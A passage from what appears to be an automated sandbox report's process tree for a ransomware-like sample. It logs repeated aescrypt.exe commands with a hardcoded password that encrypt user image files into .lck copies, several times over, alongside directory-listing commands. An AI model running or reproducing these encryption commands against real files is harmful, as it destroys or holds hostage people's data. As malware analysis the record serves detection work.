C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
3⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
3⤵
PID:3708

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
3⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
3⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
3⤵
- Modifies extensions of user files
PID:4596

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
3⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
3⤵
PID:4336

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
3⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
3⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
3⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
3⤵
PID:3280

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
3⤵
PID:3364

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
3⤵
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:3756

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:3920

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
3⤵
PID:3216

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck" "Wallpaper.jpg.lck"
3⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
3⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck" "ResizeUndo.svgz.lck"
3⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
3⤵
PID:3444

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck" "BackupImport.dxf.lck"
3⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
3⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck" "SyncDisable.gif.lck"
3⤵
PID:5080

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
3⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck" "PublishClose.emf.lck"
3⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
3⤵
PID:3616

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck" "ReadSuspend.ico.lck"
3⤵
PID:4556

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
3⤵
PID:3136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck" "EditPublish.jpg.lck"
3⤵
PID:3560

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
3⤵
- Modifies extensions of user files
PID:3376

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck" "SendSearch.tif.lck"
3⤵
- Modifies extensions of user files
PID:2924

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
3⤵
PID:3400

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck" "MoveTest.dib.lck"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
3⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck" "ProtectUndo.emz.lck"
3⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
3⤵
PID:3104

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck" "GetPublish.gif.lck"
3⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
3⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck" "PublishStep.svgz.lck"
3⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
3⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck" "ResumeRequest.wmf.lck"
3⤵
PID:640

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
3⤵
PID:3360

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck" "OptimizeMeasure.dib.lck"
3⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
3⤵
PID:3308

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck" "DenyPing.pcx.lck"
3⤵
PID:2316

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
3⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck" "SwitchRedo.svg.lck"
3⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:2436

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:3192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
3⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
3⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck" "Wallpaper.jpg.lck"
3⤵
PID:3240

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck.lck" "Wallpaper.jpg.lck.lck"
3⤵
PID:1228

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
3⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck" "ResizeUndo.svgz.lck"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3456

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck.lck" "ResizeUndo.svgz.lck.lck"
3⤵
PID:1148

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck" "BackupImport.dxf.lck"
3⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck.lck" "BackupImport.dxf.lck.lck"
3⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
3⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck" "SyncDisable.gif.lck"
3⤵
PID:1764

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck.lck" "SyncDisable.gif.lck.lck"
3⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
3⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck" "PublishClose.emf.lck"
3⤵
PID:3100

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck.lck" "PublishClose.emf.lck.lck"
3⤵
PID:3336

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
3⤵
PID:3576

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck" "ReadSuspend.ico.lck"
3⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck.lck" "ReadSuspend.ico.lck.lck"
3⤵
PID:1508

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
3⤵
PID:3244

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck" "EditPublish.jpg.lck"
3⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck.lck" "EditPublish.jpg.lck.lck"
3⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
3⤵
- Modifies extensions of user files
PID:3656

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck" "SendSearch.tif.lck"
3⤵
- Modifies extensions of user files
PID:4824

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck.lck" "SendSearch.tif.lck.lck"
3⤵
- Modifies extensions of user files
PID:3228

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
3⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck" "MoveTest.dib.lck"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3916

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck.lck" "MoveTest.dib.lck.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
3⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck" "ProtectUndo.emz.lck"
3⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck.lck" "ProtectUndo.emz.lck.lck"
3⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
3⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck" "GetPublish.gif.lck"
3⤵
PID:4768

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck.lck" "GetPublish.gif.lck.lck"
3⤵
PID:3220

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
3⤵
PID:348

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck" "PublishStep.svgz.lck"
3⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck.lck" "PublishStep.svgz.lck.lck"
3⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
3⤵
PID:744

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck" "ResumeRequest.wmf.lck"
3⤵
PID:3892

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck.lck" "ResumeRequest.wmf.lck.lck"
3⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
3⤵
PID:3588

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck" "OptimizeMeasure.dib.lck"
3⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck.lck" "OptimizeMeasure.dib.lck.lck"
3⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck" "DenyPing.pcx.lck"
3⤵
PID:1632

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck.lck" "DenyPing.pcx.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
3⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
